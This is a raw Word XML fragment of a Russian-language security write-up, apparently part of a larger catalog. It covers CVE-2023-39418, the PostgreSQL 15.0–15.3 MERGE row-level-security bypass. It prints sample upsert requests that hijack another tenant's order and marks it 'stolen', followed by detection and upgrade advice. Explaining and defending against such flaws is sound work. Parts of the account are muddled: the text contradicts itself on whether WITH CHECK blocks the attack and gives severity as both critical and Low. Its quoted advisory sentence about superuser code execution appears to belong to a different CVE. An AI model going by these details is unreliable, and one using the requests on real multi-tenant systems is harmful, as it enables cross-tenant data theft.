          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">должен fail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через WITH CHECK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Однако</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2023-39418 связана не с INSERT WITH CHECK, а с UPDATE/SELECT path. Корректная демонстрация payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /orders/upsert (JWT tenant_42)</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"id": 555,                ← существующий order tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 42,          ← пытаемся "украсть" в свой tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "stolen",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 0.01</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Если order 555 принадлежит tenant_99:</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t.id = s.id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → MATCHED для row tenant_99 (но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT policy должна был его скрыть!</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WHEN MATCHED THEN UPDATE → выполняется, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE policy должна была заблокировать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (USING: tenant_id=42, row tenant_id=99 → не matched в USING).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PG 15.0–15.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ни SELECT policy, ни UPDATE policy не применялись</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в MERGE path → row tenant_99 успешно «угнан» в tenant_42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативно — если только INSERT не contained проверки против существующих rows другого tenant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /orders/upsert (tenant_42)</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"id": 555,                ← существующий order tenant_99</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "tenant_id": 42,          ← подменяем tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "status": "stolen",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "amount": 0.01</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В patched PG (15.4+) MATCHED-проверка возвращает «no match» (SELECT policy скрывает row tenant_99) → WHEN NOT MATCHED → INSERT → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH CHECK блокирует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`id` уже существует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — primary key violation).</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Атакующий может (1) изменить tenant ownership чужих orders через MERGE WHEN MATCHED UPDATE, (2) увидеть existence чужих orders через MATCHED-resolution path, (3) подменить чужие orders без detection через cross-tenant write. Severity критична для multi-tenant SaaS, где tenant_id определяет billing/data ownership.</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MERGE statements на RLS-protected tables — индикатор. Анализ для tenant_id mismatch требует сравнения JWT-context с actually written rows.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Application-side audit: orders с tenant_id, не совпадающим с creator-tenant в audit_log.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version check: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT version()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15.0</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15.1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15.2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15.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — critical.</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MERGE был </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">новый statement type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PG 15.0, добавлен в SQL standard relatively recently. Implementation в PostgreSQL пропустила application some RLS policies для MERGE-specific paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug description в CVE advisory: *"MERGE failed to enforce UPDATE or SELECT row security policies. By default, this enabled a subquery to read or update otherwise-forbidden table rows. Within a database, an attacker having permission to create non-temporary objects in at least one schema could execute arbitrary code as the bootstrap superuser."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Технически: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INSERT WITH CHECK — apply correctly (covered by general INSERT path).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UPDATE USING — bypass для MERGE-internal updates.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SELECT USING (для MATCHED-resolution) — bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это означает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">subquery, выполняемая внутри MERGE для MATCHED-detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, читала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">все rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицы — не только те, что matching SELECT policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Связанные коммиты в PG git (для PG 15.4 release notes): *"Apply ROW LEVEL SECURITY to MERGE source query"* — это и есть фикс CVE-2023-39418.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита: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Upgrade на PG 15.4+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или 16.x, который сразу содержит fix). 15.0-15.3 — критичный upgrade.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Альтернатива (для legacy 15.0-15.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: избегать MERGE для RLS-protected tables; использовать INSERT ... ON CONFLICT DO UPDATE (который работает корректно с RLS даже в 15.0-15.3) или explicit SELECT + IF + INSERT/UPDATE.</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только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">15.0, 15.1, 15.2, 15.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10 месяцев в 2022-2023). Другие major branches (14.x, 16.x+) — нет MERGE до 15, или сразу с фиксом.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валидная роль с INSERT/UPDATE/SELECT на RLS-protected table + application использует MERGE.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MERGE statement на RLS-таблицу + WHEN MATCHED/NOT MATCHED branches.</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CVE-2023-39418</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 (Low, per PostgreSQL Project)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 августа 2023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только PG 15.0, 15.1, 15.2, 15.3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15.4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MERGE statement не enforce UPDATE/SELECT RLS policies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 через MERGE-specific paths</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MERGE — стандартный SQL standard statement для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">idempotent upsert</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Legitimate: upsert через MERGE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE INTO products AS t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING (VALUES (101, 'New Widget', 19.99))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AS s(id, name, price)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ON t.id = s.id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHEN MATCHED AND t.price &lt;&gt; s.price THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    UPDATE SET price = s.price, updated_at = now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHEN NOT MATCHED THEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSERT (id, name, price) VALUES (s.id, s.name, s.price);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-MERGE альтернативы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT ... ON CONFLICT DO UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) часто использовались для upsert, но MERGE более выразителен для complex matching logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На patched PG версиях (15.4+, 16.x+) MERGE с RLS работает корректно: SELECT/UPDATE policies применяются на всех internal paths, INSERT WITH CHECK — как обычно. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не нужно избегать MERGE на patched PG</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MERGE statements на RLS-protected tables от user-роли (не admin).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 audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: rows с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id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creator_tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если приложение логирует creator).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version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: critical check для 15.0–15.3.</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Уязвимы только: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Версия</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 (10.08.2023)</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MERGE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сразу с фиксом</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самое узкое version-window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> среди CVE-anchored категорий 3.17 — buggy окно строго 10 месяцев. Production кластеры, обновлявшиеся timely, не были подвержены этой CVE даже теоретически.</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3.17.1 / 3.17.3 / 3.17.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другие RLS-bypass vectors.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 Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая категория. CVE-2023-39418 — primarily data-access vector, но advisory отмечает potential для arbitrary code execution as bootstrap superuser в complex setup-ах (через side-effect attacks).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4.3 Хронология 2023</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
